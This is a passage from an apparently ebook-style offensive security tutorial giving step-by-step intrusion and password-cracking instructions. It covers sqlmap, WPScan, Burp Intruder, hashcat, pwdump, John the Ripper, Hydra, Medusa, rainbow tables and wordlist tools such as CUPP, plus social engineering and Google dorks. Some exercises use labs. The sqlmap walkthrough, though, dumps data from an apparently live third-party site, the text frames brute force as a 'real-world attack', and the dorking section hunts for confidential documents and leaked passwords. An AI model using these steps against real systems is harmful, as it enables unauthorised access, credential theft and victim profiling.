If you want to know if the website is vulnerable, just go to the URL and add
an apostrophe after the one, now just press enter, it will return an error
message.

You can copy the original link, without the apostrophe of course, and go to
the Kali terminal, and issue the sqlmap command. You can use the -h to
get the list of switches that you can use, but will go directly into executing
the command. So, sqlmap , then use the -u switch for the URL, and then
paste that URL.
SQL Map has detected that the DBMS running behind this website is
MySQL.

Add --dbs to the initial command. This will try to get the list of databases that
lie behind this website. Just press enter and wait for the magic.

You will be able to see that the available databases are tool
information_schema and romanian_svc . We are interested in the
Romanian_svc database. The other command we should issue at this stage is
the same as the original one but with the -D switch to specify the database
name, romanian_svcin our case, and then use --tables . The --tables will
fetch all the tables that are in the romanian_svc database. Press enter; as you
will see the list of tables in this database.
We are interested in getting the content of the table named, for example,
ra_autori . So add that and then --columns , it will display all the columns in
the table ra_autoriunder the database romanian_svc . You will see the
schema design of the table; it has like a couple of columns that we can dump
to our local computer.

So just get back the previous command and remove these columns, use -C ,
and then you can select the column names like nume , nume_nd , and
prenume .
And then U –dump switch, to retrieve the content of this table with all the
relevant information in it.
You will be able to see the content of the table, and the dump is now on our
PC. You will be able to see the path where the dump was downloaded to our
computer.

If you want to see it, copy the link and open a new window. Use leafpad then
paste, and press enter. This table does not contain confidential information; it
is just for tutorial reasons. Some of the websites might be vulnerable and you
might be interested in targeting tables that have usernames and passwords.
Some of the vulnerable websites have their passwords hashed.
The best part about this tool is able to automatically decrypt these hashes for
you. Sometimes SQL map might not be able to crack the passwords, so you
can use other applications or tools like John the Ripper to do that.

Easily Hack a WordPress Site

WPscan is a very important tool that can reveal lots of information about a
WordPress website. It will give you information about the version installed,
the theme used and the vulnerable component employed. You can as well
enumerate the users configured on the website.
If used together with the Nikto application, you will be able to assess your
web server in a very good way. Go to turnkeylinux.org to download a
WordPress virtual machine (https://www.turnkeylinux.org/wordpress), install
it, and follow the wizard in order to set it up, use wpadmin as a username.
The process is very easy and straightforward. The initialized machine will
look similar to the below image.
So, the IP of the machine is 192.168.1.143.We will go to our KALI machine,
open the terminal, and use the command: wpscan-- update

It will update the database which is a prerequisite to start using the

application. Now invoke the command wpscan--URL , then you specify the
URL, the domain name, or the IP that you want to attack.
It will give us important information about the server type, WordPress
version, theme used, and the plugins installed, as well as backup
configuration. We can append this command by using the E switch which is
enumerated, or we can tell it to enumerate U, which means users. Now, the
scanner will start over and it will attempt to enumerate the users.
Now let me teach you what can WPscan enumerate. If you search for the E
switch, it can enumerate vulnerable plugins, vulnerable themes, db exports,
and users. With the use of different switches, you will be able to get more
information about that.
Now we have a very important piece of information which is the admin
username. Now we will try to Brute force this admin username. For this case,
I have created a simple wordlist, which is wordlist.txt. But in your case, if
you are doing a real-world attack, you can go to wpwhitesecurity.com.
Follow this link and download the zip file which has over a million
passwords related to WordPress, which are very useful.
You can as well use the famous Rocky0u wordlist or the darkc0de wordlists,
which has more than 14 million passwords. Now using the wordlist I have
created, I will just append my command, use the switch P and specify the
wordlist location and then use the switch u and specify the username which is
admin. You can as well set the number of threads which are parallel attempts
to try to Brute force into the account. Press Enter and wait for the magic.
wpscan--url http://192.168.1.143 –passwords wordlist.txt –usernames
wpadmin
The following explains what the above command does:
–url : The URL of the WordPress website to scan. In the above example, we
are scanning http://192.168.1.143.
–passwords : Takes a list of password files (comma separated) to use during
the password attack. In this example, we are using the wordlist we created.

–usernames : Specifies one or more usernames (comma separated) to run this

attack against. In the above example, the scan targeted the user is wpadmin,
for example
WPScan will try to identify the password. To prevent users from enumeration
attacks, avoid using usernames as nicknames, as WPscan will identify
usernames from the URLs used. To protect yourself against password brute
force attacks, try to use secure plugins that will limit login attempts for
certain usernames and IP addresses. Also, make sure to set out a password
lockout or the account lockout time. You can as well use combined
usernames, such as
wpscan --url http://192.168.1.143 –passwords wordlist.txt –usernames
wpadmin, kali, kali

Intercept, Analyze, and Replay Web Traffic

Burp suite is a tool to perform web application security testing. It is available
in commercial and free additions; you can go to the portswigger.net website
that will facilitate a comparison between the different versions. I can tell you
in advance that it is a must-have tool for penetration testers, and a very
important tool as it does passive scanning, active scanning, and brute force
attacks. It also performs analysis for session IDs and the tokens generated by
the web application to check the level of randomness. Further utilization of
Burp suite can be related to fuzzing attacks which are an attempt to insert
random or garbage information into text boxes to test the application’s data
sanitization capabilities.
Run the vulnerable Metasploitable box. As shown below, the IP is
192.168.61.176

Go to your Kali machine and open the burp suite form the main menu. Make
sure to go to the proxy tab and turn off the interception.

The interception can be defined as all the requests will be queued there and
you need to forward them to the destination server manually. Disable that
feature for the time being. Now go to the options tab to spot the port where
the burp suite is running on; 8080 in this case.
Now open the web browser (Firefox ESR) on your Kali machine, go to the
preferences and make sure to configure the proxy settings to use the Port
8080, as shown below.

Now all the traffic that is going out from this browser will pass through our
burp suite proxy before hitting the server. Let us close that box and navigate
to the meta exploitable machine, to the damn vulnerable web application, as
shown below.
Now if you go back to your burp suite, under the Target tab and the Sitemap
sub-tab, you will see that it has identified the applications under the relevant
IP.

If we go to the damn vulnerable web application, I will use the

username, admin, and password password to log in. You will notice that
the burp suite has already identified this login under the damn vulnerable web
application folder.
This is due to the passive scanning burp suite does. If you go and browse the
site of the damn vulnerable web application, just do a normal browsing to the
site, burp suite will do like a kind of passive scanning all the pages that you
visit, it takes a look at the pages and checks the results for the vulnerabilities.
If you go to the scanner tab, you will be able to see all the results obtained by
the burp suite and this is available only in the professional version. It will tell
you the issue found on the page that you browse and it will color code them
based on the criticality of the issue.
Go back again to DVWA, try to log in again using random usernames and
passwords. Minimize that and go to the burp suite again, you will see that it
has identified this attempt.

Now we want to Brute force into DVWA by trying to guess the username and
password. Right-click on the identified login attempt, and press send to
intruder
Go to the intruder tab, then to the positions tab, you will see that the burp
suite has identified these arguments that have been sent to the servers.

Now we are only interested in brute-forcing the username and password so

you can clear all, just select the username and the password, press enter.

Now we will choose the type of attack, we have sniper attack, battering,
pitchfork, and cluster bomb. A sniper attack is used to Brute force on one
argument. Meanwhile, a cluster bomb is used to brute force more than one
argument. In our case, it is a cluster bomb. Choose that, then go to the
payload tab, you will see that it has identified two arguments under the
payload set. Argument one is username; we will select the payload type as a
simple list. The same goes for the password attack or the password payload.

Now going to the payload options, we can add random usernames, but I will
only use admin. As for the password payload options, I will load a wordlist I
created earlier.

The only thing left to do is to press on the Start attack. Of course, in the
professional version, you will have more options to do. The attack will start
and you will be able to see the different combinations burp suite is
performing. Eventually, if you are using the proper word lists, it will guess
the username and the password. Scanning through the results, you will see
that the location is login for these unsuccessful attempts. Meanwhile, the
location is the index for this attempt which is the correct one.
Simple Ways to Gain Access
Various Password Attacks
We will touch upon a juicy topic on how to gain access to systems.
Theoretically speaking, if you have the right password, you will gain access
to the system. But also, we need to answer the following question: How can I
get the password?
There are two ways to do that, offline or online attacks. An offline attack is
when the target in question has been compromised, and you have acquired
the file that has the hashes of the passwords. The file is usually moved to
your system, where you apply techniques such as brute force, hybrid, or
rainbow table attacks to crack the password, at your own time and
convenience.
Meanwhile, online password attacks happen when you do not have access
directly to the system, and you are trying to gain access remotely. This is
something that usually happens when you are presented by a web form, for
example, or other types of authentication forms.
The attacker will employ, dictionary attacks, brute force attacks, and other
types of attacks such as man-in-the-middle, replay, and wire sniffing. The
key difference between both of the attacks is the fact that for an offline attack
to take place, you must have the hash for the password, meanwhile, the
online attack is live and a bit noisy as it will alert administrators that certain
attack is taking place, and you might as well be blocked. Your IP might be
blacklisted and some password policies might apply for the lockout period.
It is important to point out that online attacks are more difficult to execute
than offline attacks.
Non-technical attacks have to do with phishing techniques, social
engineering, and shoulder surfing that usually takes place in public places,
along with dumpster diving, which happens when a criminal digs into the
trash of a victim to get more information about possible passwords. A
dictionary attack and a brute force attack are common between both offline
and online; it is usually the easiest way to adopt for guessing passwords. A
dictionary attack could be identified when the attacker uses a file that has
possible words from the dictionary and tries to guess the password either
manually or using a system or an application.
A Brute force attack happens when the attacker uses a character set, like all
the uppercase characters, the lowercase characters, the symbols, or all the
numbers, and then this combination takes place to generate the username and
password. This is usually considered a lengthy process.
Hybrid attacks are a combination of attacks. On one side, it is simply a
dictionary attack, while the other is the result of a brute force attack.
Alternatively, you can use rule-based attacks to replace the brute force ones.
Below is a list of attacks, and the techniques used in each.
Offline Password Attacks: Dictionary, Brute force, Hybrid, Rule-based,
Rainbow Table
Online Password Attacks: Dictionary, Brute force, Resetting, MITM, Replay,
Wire Sniffing
Non-technical Password Attacks: Social Engineering, Shoulder Surfing,
Dumpster Diving.
Rule-based attacks happen when you have information about the target’s
password nature. If you have the password policy of the victim or the
company that you are ethically attacking, you will feed this information in an
application that will generate passwords based on that criteria. Statistically
speaking, this will enhance the time needed to crack a password.
The Rainbow table is a list of pre-computed hashes, where the corresponding
password is there next to the hash, which is already cracked. To do that, you
just compare the hash that you have with the hash found in the rainbow tables
and if there is a match, BINGO!
For online password attacks, the same techniques apply in terms of using a
dictionary and brute force attacks. In many cases, it is easier to reset a
password than to guess it. If you have access to the system you might use a
bootable Linux CD. With the help of certain applications, you will be able to
find user names and reset their passwords.
Other types of techniques apply when you do not want to interact directly
with the victim, but you are there on the network sniffing, capturing hashes,
and reusing them to authenticate.

Hashing in a Nutshell
A cryptographic hash function is a mathematical formula that helps you
convert a given value to another string value that is irreversible. The resulting
value after hashing is smaller compared to the data that passed through the
function. Often these strings have a fixed length.
As you can see below the input varies from Fox to the red fox, jumps over the
blue dog, we are using the same cryptographic hash function and the resulting
hash or message digest is of the same length. Even if we change one
character, the red fox jumps over the blue dog, and between the input where
we removed the V, the resulting value is a totally different hash. So, to put it
another way; hashes are fingerprints of some data and it is about random-
looking characters that uniquely identify the data in question.
We can hash anything; you can hash text, sentence, password, you can hash a
file, you can hash an mp4 file. In short, you can hash anything.

We use hash for three purposes; to verify files, software creators often take
your file download and run it through a hash function, and then on their
official site, the hash and the file to download. So, for you to verify that you
have downloaded the right file, it hasn't been compromised or infected with a
malware, you just download the file, and generate, attach and compare the
hashes that are found on the website and the hashes that you generate. If these
match, then you have downloaded the right file.
Let us take a simple example, if you open PowerShell, and go to the root.
Suppose that you downloaded a file, and you want to get the hash of this file,
to know that this file has not been compromised, you can do this by running
this command: Get-FileHash and then the name of the file to get its hash.
Now you have to compare it to the hash found on the website that you have
downloaded the file from. If there is a match, then it is the original file.

The other purpose of hashing is password storage. There are two ways
passwords are typically stored on a server. The first is in a clearly visible
plain text, clearly an issue! So, the best way to store passwords is to hash
them first. When you first create a password on a secure system, it hashes the
password before storing it. So, it does not store your actual password in a
database; but it stores the hash of the password, and forgets what you actually
typed. The next time you type in your password, it hashes what you typed in
and compares the hash that is generated with the hash that is stored in the
database, and if there is a match, you will be granted access. This is so
valuable because if the hashes, or even the hash database have been stolen, it
cannot be read by the bad guys supposedly, instead of seeing a list of
passwords, they will see a list of hashes that can be useless.
The third type of usage is database searching. Hashing can speed up the
process of searching through a database, so that when we store a long list of
names in a table, and we need to find a certain name in that list, the computer
can search for the name of course, but that might be a long process because it
has to match a large string of characters. So, we can significantly shorten that
time by creating a hash for every name on the list, and as long as the hash is
shorter than the average name length, then the search will be faster and
easier.
Below is a list of mostly used hashes
Length Example
SHA-1 160 bits 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
SHA-256 256 bits 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
SHA-512 512 bits b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d778
MD4 128 bits 8a9d093f14f8701df17732b2bb182c74
MD5 128 bits 5f4dcc3b5aa765d61d8327deb882cf99
LM (case 128 bits D6F6E4A3E600550693E28745B8BF4BA6
insensitive)
NT or 128 bits 8846F7EAEE8FB117AD06BDD830B7586C
NTLMv2

It would be useful to know the difference between encryption and hashing.

Encryption is a two-way function; data is encrypted with the purpose of being
decrypted at a later time. This is the only good way to store and move data in
a secure fashion. Meanwhile, hashing is never meant to be reversed, it is a
one-way process. So, it is not meant to be a secure way to store or move data,
but it is purely used as an easy way to compare data or to compare blocks of
data.
As you might have realized, there is a problem with hashing, since they
produce a fixed-length value, and we have a finite number of hashes for each
type of algorithm, which makes collisions possible. So, a collision is when
two different data or inputs of data produce the same hash. This is rare, but it
happens. So, naturally the longer the hash value, the less likely a collision
will happen.

Execute an Offline Password Attack on Linux

We will now learn how to perform an offline password attack using an
application called Hashcat. Hashcat is currently the world's fastest password
cracking software, It supports different types of hashes, and uses numeric
codes for each hash type.
Suppose that we were able to compromise a Linux machine, next is to get the
hash file of the passwords stored there, usually under shadow file. Open this
file; you will see the list of users on this machine and the password after the
colon in a hashed format. Copy this file and name it hacked hash.lst and then
open this file again using leafpad and clean it.

Remove the user and remove the colon then go through the hash until the
next colon, remove the next colon and the rest of the file. So now you have a
clean file that only has hashes, close it. Now we will open hashcat from the
main menu (See the steps below).
Once you open it, the help menu will pop up, you will be able to see different
options that you will use. Mainly, we will use the M option which specifies
the hash type, the A option, which specifies the attack mode, and the O
option which specifies the output.

So, going down, you will be able to see the hash modes it supports as I said
earlier, lots of hashes; MD4, MD5, SHAs, etc. To make it easier, you can go
to the site ashcat.net, and you will be able to see them in a tabular format.
The output formats are hash, plain text, etc.
The attack modes can be straight, which means dictionary attack or wordlist
attack, combination attack, Brute force, or a hybrid wordlist plus mask. And
the device types of port it can be CPU, GPU or FPGA.
So, because this is the fastest application for password attacks, it will not only
run on CPUs, it will be optimized thrown on GPUs, and PGA, which are
application-specific kind of processes. So, let us go to the bread and butter
and type the command: hashcat-m . M will specify the hash type that we
want to crack. The encryption method in Linux is SHA512.
If you go again to the site, as SHA512 for UNIX, the number is 1800. So type
m space 1800, then a, which specifies the attack type, we will go just a
dictionary attack type, then you will specify the output. The output will be
put in the cracked.txt file, and then you refer to the location of the hash file,
which is hash, hackedhash.lst.
And then we will be using a simple word list, wordlist.txt, and then we will
use force.
During the cracking phase, you can press on s to see the status, it will tell you
that it is running, and this is the target hash that we want to crack, the time
started, and the estimated time, as it will take around three hours to finish.

If you press again on status, you will see that the progress, so let us wait.
Make sure that if you use the wrong hash type, the application will give you
an error and will not be able to start cracking the hash. So, make sure you do
well base research on the type of the hash that you are cracking. One of the
applications that might be beneficial is the hash identifier, you open it and
just paste the hash, and it will tell you what kind of hash is that.

Check the application status after a few hours; now you will find that it is
cracked, meaning that the password has been figured out. To be able to see
the password, locate the cracked.txt file, to see the hash that has been
cracked, and the password, as shown below.
Execute an Offline Password Attack on Windows:
In order to crack passwords in an offline mode, you must first obtain the
hashes stored within the operating system. In our case, the operating system
is windows and these hashes are stored in the SAM file which is located
under C:/Windows/System32/config. If you try to open this SAM file, it will
tell you that it cannot be opened. So obviously this file is not accessible while
the operating system is booted.
If you have physical access to the Windows machine, you can run a Kali live
CD that is capable of reading NTFS drives and capable of mounting the
windows partitions. This way you will copy the SAM file easily to an
external media. Now go online to
https://www.openwall.com/passwords/windows-pwdumpand download a
copy of PW dump or password dump.
Extract this folder to your Windows machine on the root C drive. Then go to
the command line, run it in admin mode and go to the password dump, then
issue the command pwdump.exe, then redirect the output to cracked.txt file,
as shown below.

Go to the password dump folder and open the cracked.txt file, you will notice
that the hashes of the Windows machine has been dumped, and you will see
the list of usernames, the IDs of the usernames, and two hashes separated by
column. The hash on the left side is the old LM hash, and the hash on the
right side is the new NT or NTLM hash, which is more secure.
Copy the NTLM hash and go to the Kali machine, open the terminal, now we
want to create a file to store this hash. Use the command echo, and then
redirect the output to a file named windowshash.txt. Use cat to view the
content of the file, as seen below.

Now we will use John the Ripper to crack this hash. John the Ripper is
actually one of my favorite password cracking tools because it supports lots
of hashes. It is very easy to use; in your terminal, type in John, and a help
menu will pop up, the syntax is very easy, use John, options, and password
file.
If you write john, then list equal formats, you will see all the hashes that are
supported by John. If you do not specify the format, John will kind of
recognize the format on its own. But to make things easier, we will tell john
the format type of the hash which is NT. Specify the file that contains the
hash you want to crack, then you specify a word list, any word list. John can
use its own word list or you can download extra word lists from the internet.
You will learn in the upcoming sections on how to create good word lists.
But in the meantime, I have created my own word list for the sake of this
example. Wordlist equals wl.lst, just a random word list that I am using and
just hit enter, as shown below.

So obviously, it has figured out the password, which is P@ssw0rd.

Once john figures the password, it will store it in a file called john.pot .
Locate to locate john.pot . Just copy that and try to open it in a leaf pad. This
is our hash, which is NT, and this is the crack password, as shown below.
If you want to crack the same hash again, john will not redo the effort, unless
you remove the john.pot file. John supports advanced password
manipulation cracking by using rules; issue the command john --list=rules ,
to see the advanced rules that john might choose to crack a hash.
These rules include adding trailing character, alphanumeric, capitalizing,
etcetera. If you want to see the details of these rules, just look at the file
john.com and open it, search for the word rule, and you will be able to see the
details of the rules. Such as the rules called single and you can see the
password manipulation techniques that it does. Another rule is called Word
List, another rule is called extra, which mainly does insertion, always strike
of some characters. You can just explore them on your own.

Run an Online Password Attack on Linux

Hydra is a very famous online password cracking tool, it supports many
protocols such as CiscoAAA, POP3, SMTP, SIP, Telnet, FTP, SSH, and lots
more. Navigate to the main menu and locate Hydra.
The syntax of using Hydra is easy. Provide a username, a password, and the
protocol you want to attack. You can provide it with a username if you type l
or user list If you type L, the same goes for password, type p if you want to
clearly type the password, and type P if you want to use a password list. The
same goes if you want to provide lots of targets you want to attack along with
the protocol.
Let us spin up a vulnerable Linux and attempt to crack its password. Navigate
to the Rapid7 website and download the metasploitable2 virtual machine
from there. Open your VMware player and import the machine, as shown
below.

Clear the screen, type if config to see the IP address assigned to this machine
to use in the attack. Open another terminal in Kali and run the Nmap
command on metasploitable2 IP, just to see the services running on the
machine, it has lots of services running FTP, SSH, Telnet, etc.
We want to try to attack this machine on the FTP service. Just type in Hydra,
we will provide the username as msfadmin, and we will also provide a word
list which is rockyou.txt. The service to attack is FTP, and I provide the IP
address. It is as simple as that, you just wait for a couple of minutes or even
seconds before Hydra pops up the password, which is msfadmin. We will do
the same for the Telnet services, you just changed the protocol from FTP to
Telnet, and just press enter and hydra will do the same. Quite easy as well.
You can do the same for SSH and lots of other services.
Run an Online Password Attack on a Router
We will now attempt to crack the password of the router that connects us to
the internet, let us ping it first to make sure that we have a connection. For
this purpose, we will use a tool called Medusa to try to figure out the
password, and once you write medusa, the switch's menu will appear. It is
actually quite easy to use.
But first, let me explain a bit about Medusa which is a very fast and
massively parallel modular login with Brute force. It has modules available to
support almost any service that allows remote authentication using a
password such as FTP, POP3, Microsoft SQL, MySQL SMTP, Telnet, and
VNC. Compared to Hydra, which is process-based, Medusa is thread based,
which means it is actually much faster than Hydra. Let us go to the bread and
butter and try to crack the password. Issue the commandment medusa, then
provide the host IP using the h switch, and then you provide the username,
usually the default username is admin. The password; just enter P in
uppercase and provide the path to the rockyou.txt word list. Then specify the
protocol which is HTTP.

Hit enter and watch Medusa do the work. Medusa will try various passwords
that are found in the wordlist which contains more than 14 million passwords.
It will go through all the options until it finds the right password.

Crack Passwords with Rainbow Tables

The name does not reflect the real nature of its role, and sounds like a fun
children’s game, but it is actually a powerful tool for decrypting passwords.
When it comes to password cracking, we have two options. Brute-force
password cracking programs such as John the Ripper, in where an attacker
Brute forces a password by generating a hash for every attempt or for every
possible password combination he has. Then he compares the resulting hash
to the hash in the table he wants to crack. If he gets a match, then he knows
the password. The second option is to load a password cracking dictionary
containing hundreds of thousands of commonly used passwords and see if he
gets any hits. These methods can take weeks, months, or even years if the
passwords are strong enough.
To cut the time short, what if this attacker saves his Brute force work by
creating a table for all the passwords and hashes he was generating, next time
he only compares two hashes, this will save the computation time to convert
an alphanumeric password to a hash, and then compare this hash to the hash
and the table he wants to crack. This will significantly speed up the cracking
process. However, the table would have to be huge to have every possible
password.
So, as you may notice, a rainbow table is a file of pre-computed password
hashes. Rainbow cracking is proven to be more effective and less time
consuming than Brute force and dictionary attacks. It uses less computer
processing time, but more storage. Before we begin to crack hashes using
rainbow tables, we need to generate these rainbow tables. Before doing so,
you need to install the Rainbowcrack application, using apt-get install
rainbowcrack command. You can then generate the files using the command
rtgen along with the appropriate switches, such as
rtgen md5 loweralpha-numeric 1 7 0 2400 24652134 0

The character set can be alphanumeric, lower-alpha; it can be numeric,

etcetera. These two arguments are the size of the password, the length of the
password, minimum, and maximum. Then we have these arguments shown
below which are related, to be honest to advanced cryptographic stuff, we
will not go deep into that now, I will give you just a general guideline on that.
The table index is the reduction function we will have in this rainbow table
generated. Meanwhile, the chain length is simply the length of the chain you
want to generate and the chain number. As you may notice the rainbow table
is an array of rainbow chains. So, you have to specify the numbers of the
chains you want to have in this rainbow table and the part index to store the
large rainbow table in smaller chunks. Do not worry about this, just focus on
the first two or first couple of arguments.
So, let us start by creating a rainbow table for the MD5 algorithm, we will
use numeric as our character set and the minimum length is one and the
maximum length is eight. And we will use these default values like zero,
thousand, thousand, and zero.
Now if go to the directory, we will able to see the rainbow table file
generated. Next, we need to sort this file; we will invoke the command or the
source and just provide the path just by using a dot.

After we have generated the rainbow table and sorted it using the rtsort
command, now it is time to crack a hash using this method. Just write
rainbowcrack then use dot to refer to the rainbow tables found and the
current directory, then provide the H argument and provide the hash. For this
purpose, we will go to an online MD5 hash generator and select any string
(1111 in this case). Copy the hash, then paste it and hit enter. It is very fast as
you can notice and the results should tell you that the hash corresponds to the
password.
Design Effective Wordlists
Word lists can be obtained from password cracking programs, or by
downloading them from the internet. Wordlists are used for general purposes,
they have many random passwords, thus they are huge in size.
For example, you can search the internet for a wordlist called darkc0de. Or
you can search for another famous word list called Rocky0u. These contain
more than 14 million passwords that are compliant with the latest password
policies.
Suppose that you want to create your own word list for a specific attack, you
can use two tools for this purpose. The first one is called crunch, which is a
wordlist generator based on the user-specified character set. It takes the
character set designated by the user and generates all combinations and
permutations possible into a new wordlist.
The second tool is called CUPP. CUPP stands for Common User Passwords
Profiler, and it is available on GitHub. Copy the Github link, go to your Kali
machine, open the terminal and write the following command; git clone, then
paste the URL and wait for it to be cloned on your local machine.
Invoke the ls command, navigate to the cup directory, then list its content.

So, you will write python3, then the name of the file, and the argument of -i .
This will prompt you with lots of questions. So basically; this tool will gather
information about the target and will use this information to generate its own
word list.

Here's an example. Suppose the name of the victim is John and the surname
is Doe, the nickname is Joe, and the birth date is 11-December, 1992. His
partner's name is Ryan, her nickname is Ray, and her birth date is 02-05-
2000. Their child's name is Will, the child's nickname is Willie, and the birth
date is 05-07-2004.
Pet’s name is Tom, the company name is just a random company name,
Innovate Corp. Do you want to add some keywords to the victim? If you have
some keywords, like you can describe him; he is handsome, he works in the
technology field. So just imagine some of the words that this victim might be
using. Do you want to add special characters to the end of the word? Yes. Do
you want to add some random numbers to the end of the word? Yes.
Do you want to enable the leet mode? Yes or no?
Leet mode is the usage of ASCII characters to replace Latin characters in
ways that it reflects resemblance. 1337 resembles leet. If we write a password
like p@ssw0rd, the zero resembles the O and the @ resembles the A. So we
will say yes, and it will take some time to generate the word lists containing
more than 60,000 words.
So, let us open the list called john.txt. I will use a leaf pad to open john.txt.
The list will be containing all the permutations and all the combinations of
the information provided to the victim. So probably, the victim might be
using one of these permutations. Because the passwords you use usually
include your name, family name, your pet us name, birth date, your partner's
name, etcetera. This will help you do a more successful attack with a high
probability of guessing the password.
Now moving to crunch, just type crunch and hit enter and you will see the
syntax on how to run it.

You will specify the minimum length of the password you want, and the
maximum length of the password you want. If you hit enter, it will use the
default character set of alpha lowercase, so just hit enter, and now it will
generate a huge word list containing more than a million passwords, so I will
just stop it at some point.
To make things easier, you can specify the characters set that you want. In
this case, I will use the character set of abcd123. Hit Enter, it will only use
these characters sets to generate a password with a minimum four, maximum
five, and you will get the results. If you want to include numbers as well, you
can add it to the character set, hit enter, and you will see the result. You can
as well export this file by using the argument of O and then just rename it
mywordlist.txt, it will just redirect the output to the file.

You can notice that all the combinations and the possibilities from the
characters set you have chosen.

Now, to make things more interesting, suppose that we want to add a pattern
to the password, we have to use special symbols; at to specify lowercase,
comma to specify uppercase, percentage sign to specify numbers, and the psi
to specify symbols. Suppose that my pattern will be in the password, which is
a four-character password, for example, just to make it easier for you to
understand.

We will always start with lowercase; we want to use number and then
uppercase and we want our password always to end with the letter Z. So, we
have a four-letter password. As you can see below, this is the character set we
are choosing from, and the pattern is four characters. The first character is
lowercase, then number that uppercase and a standard Z. So, let us discover
how it goes. It will generate 1820 password, and you will see all the
permutations. Let us take them to an output file to make it easier, and open
that.
So, the first letter is lowercase, then number all the time, then uppercase, then
Z, and these are all the possible combinations. Of course, you can make it
more complex by using longer passwords, and by using an extended
character set. For this purpose, and as we have seen with rainbow tables
before, the character set is found in a table or in a file called charset.txt.

So, let us see the content of this file. It has all the character sets, numeric, the
alphanumeric, [] alpha, and all our numeric and the mix alpha, etcetera. So,
let us use this file to generate a word list in crunch, so we will use the same
command, just invoke the F argument to specify the file again.
And now we need to specify the character set name. Again, let us open it and
leaf pad and remember the character set name. For example, it is lowered
alpha dash numeric, so let us go to the command again and write lower-alpha
dash numeric.

So it will use the lower alpha dash numeric character set from this file, and let
us output this file to rainbow wordlist.txt, and on top of that, let us zip it by
using the Z argument and using the gunzip utility, so just press enter and wait
for the result. As you will notice, it will create this file; Rainbow wordlist.txt
with all the permutations and all the combinations from the lower
alphanumeric character set under this file, and all the passwords are of length
of four characters.

So, let us see the file after unzipping it. All the passwords are the length of
four with all the combinations from the chosen character set. A sample is
shown below.
Proven Social Engineering Techniques
Attack Vectors
Social engineering is the art of manipulating people psychologically so they
give up confidential information; we will not be using any of the technical
approaches we learned earlier. One of the attack vectors can be pretexting,
which is the act of creating or inventing a scenario to lure the victim to
participate in it.
A famous example can be those emails you usually receive about an African
prince who has passed away and your name appears on his will, where you
are asked to provide a copy of your passport and a couple of dollars so that
they process this further, some people fall for this trick.
Another attack vector is diversion theft, which can be understood through the
following example. If you are going to a bank to deposit your money in an
ATM, maybe some guys would lie to you that the ATM machine is currently
out of order and that you can just deposit your money in a van related to the
bank or a certain kiosk related to a bank, so it is actually diverting the
attention or changing the actual action that needs to be performed by the
victim.
Phishing is the act of sending emails that appear to come from a legitimate
business or a bank, in where you are asked to provide information or
verification such as credit card number, CVV number, and similar related
information. Spear phishing is the same as phishing but it is targeting a
specific group and the rate of success is more than the phishing because
phishing is targeted towards the mass, and it has a low rate of success, but in
spear-phishing the attacker does more research and he attacks certain groups
of people so that the probability of having a successful attack is higher.
Baiting attacks use a false promise to pique a victim’s greed or curiosity. For
example, if you create a USB drive, you put a malicious file in it, and you
throw it in a public place such as a parking, an elevator, walkways. You
might mark this USB as confidential, or salaries of 2021, etc. Some people
will fall for the trick, and they will take this USB and just put it in their
computers just out of curiosity to see what is in it. At this moment, the
computer will be infected depending on the payload as well and the attacker
might have full remote control over this computer.
Tailgating is when the attacker gains access to a restricted area by following a
person or entering behind that person who used his legitimate access, so that
the person will have access to this area without any kind of identification or
any kind of questions asked.
Vishing is voice phishing; it is where the criminal practices social
engineering over the telephone system to gain access to private or personal
financial information, etc.
Water holing is similar to phishing, but in a different context. With most of
the cases, people are aware of phishing attacks, and they are not ready to
press on the links of any of these emails, but they are ready to press on the
links on the websites they trust. Some kind of research will be done in this
aspect so that the attacker will research the websites that are mostly visited by
this user, and will then check the vulnerabilities found on this website to
inject these links. And the user will, since the user is trusting the website,
he/she will be more inclined to press on these links.

Open-source Intelligence (OSINT):

What is your primary source of data? You might answer Google, but the fact
is that there’s an ocean of data out there in the world that is not accessed by
Google. It depends on your use case; you need to collect relevant information
to prepare it for a certain kind of attack.
Open-source intelligence or as abbreviated by OSINT is the collection and
analysis of information that is gathered from the public or open sources, it
has many sources such as media, in where you look into newspapers,
magazines, radio, television on information related to the target that you want
to attack or compromise.
You can look over the internet, the easiest way is to use YouTube, Facebook,
Twitter, Instagram, Google, blogs, discussion groups, some kind of websites
like Pipl, Hunter, etc.
Another source is public governmental data, such as speeches, websites, press
conferences, and telephone directories. Another source can be commercial
data, such as professional databases and related databases. Another source is
academic publications such as conferences, academic papers, journals, and
last but not least is grey literature such as patents, reprints, and technical
reports.

Google Dorks Live Examples

Google Dorking or Google hacking is an information-gathering technique
that uses Google search and other Google applications to find security roles
in the configuration of any server, application, or a website. You will
leverage the advanced search operators offered by Google in order to locate
specific logic, such as string text within a result. Google offers enhanced or
advanced search operators, such as in URL, Intext, site, etc.
So, let us jump directly to an example to demonstrate what I am talking
about. So, suppose that you want to search for a confidential document over
the internet, under a governmental website for example. You have to know
the arguments that you want to search for; such as governmental site,
confidential document, and the type of the document.
We start this way; the site is the argument or search operator that defines
what kind of site we are looking for. So, we are looking for under the
governmental site as a top-level domain, we are also looking for a PDF file,
and you name the string that you want to search for, such as “this document
is confidential”.

So, we will get a list of results having PDF files, we have to look into them.
Let us open these files and search for the word “confidential”. So, this is just
a basic way to search for confidential documents, if you are targeting
someone in mind, you need to fine-grain your search criteria. But in general,
it is very easy to find such information using Google search.
Suppose that you want to find passwords, for example. Log files contain a
string called 'your password is'. So, let us search for the string, 'your
password is' in a text file type. This will bring a couple of log files; you just
can open and look into them. Below is a sample result.
Suppose that you want to search for IP cameras or print servers that are
published over the internet. Two arguments come in handy here, in title and
URL. The in title argument will search in the title of the page, and the
argument in URL will search for the URL of the page only. So in the title, let
us say the network print server and file type is SHTM, you will be able to see
a couple of results.

Another example, if you want to find a page with grades, for example, final
grades, you can use this in URL, final grades, and the site we are looking at is
an educational site. You will get a list of final grades plus IDs. As you notice,
you can tailor the research in ways you want using advanced operators, again
in URL, Intext file type, site, there are lots more you can use, but these are
the basic ones.

And let me tell you something else. Instead of keeping those arguments in
mind, you can go to the exploit DB website on www.exploit-db.com/google-
hacking-database, Google hacking database, and you will see all of these
vulnerabilities in one place. All you have to do is to search for the category.
Let us take an example of vulnerable files, or maybe files containing
passwords. These are some of the examples here, as shown below.
